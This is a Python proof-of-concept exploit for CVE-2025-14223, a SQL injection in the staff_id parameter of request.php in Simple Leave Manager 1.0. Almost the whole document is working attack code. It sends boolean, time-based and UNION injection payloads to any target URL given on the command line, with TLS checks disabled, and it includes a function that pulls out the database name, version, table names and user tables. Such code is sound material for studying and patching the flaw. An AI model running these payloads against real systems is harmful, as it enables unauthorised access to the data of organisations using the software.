CVE-2025-14223 Simple Leave Manager 1.0 SQL注入漏洞

#!/usr/bin/env python3 """ CVE-2025-14223 PoC - Simple Leave Manager 1.0 SQL Injection Target: /request.php staff_id parameter CVSS: 7.3 (High) """ import requests import sys from urllib.parse import urlencode def test_sql_injection(base_url): """Test for SQL injection vulnerability in staff_id parameter""" # Target endpoint target = f"{base_url}/request.php" # Payload: Boolean-based blind SQL injection # Original: staff_id=1 # Injected: staff_id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- - payloads = [ # Basic injection test {"staff_id": "1' OR '1'='1"}, # Boolean-based blind injection {"staff_id": "1' AND 1=1--"}, {"staff_id": "1' AND 1=2--"}, # Time-based blind injection {"staff_id": "1' AND SLEEP(5)--"}, # Union-based injection to extract database version {"staff_id": "1' UNION SELECT NULL,@@version,NULL--"}, ] print(f"[*] Testing {target}") print(f"[*] Vulnerability: SQL Injection in staff_id parameter") print("-" * 60) for i, payload in enumerate(payloads, 1): print(f"\n[Test {i}] Payload: {payload['staff_id']}") try: response = requests.post( target, data=payload, timeout=10, verify=False ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") # Check for SQL error indicators if "sql" in response.text.lower() or "mysql" in response.text.lower(): print("[!] Potential SQL error detected!") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n" + "-" * 60) print("[*] Testing complete") def extract_data(base_url): """Extract data using UNION-based SQL injection""" target = f"{base_url}/request.php" # Data extraction payloads extraction_payloads = { "database_version": "1' UNION SELECT NULL,version(),NULL,NULL--", "database_name": "1' UNION SELECT NULL,database(),NULL,NULL--", "table_names": "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL FROM information_schema.tables WHERE table_schema=database()--", "user_table": "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL FROM information_schema.tables WHERE table_name LIKE '%user%'--" } print("\n[*] Attempting data extraction...") for name, payload in extraction_payloads.items(): print(f"\n[*] Extracting: {name}") print(f"[*] Payload: {payload}") try: response = requests.post( target, data={"staff_id": payload}, timeout=10, verify=False ) if response.status_code == 200: print(f"[+] Response received (length: {len(response.text)})") # Parse and display relevant data # Note: Actual implementation would parse HTML response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} http://target.com") sys.exit(1) base_url = sys.argv[1].rstrip('/') test_sql_injection(base_url) # Uncomment to attempt data extraction # extract_data(base_url)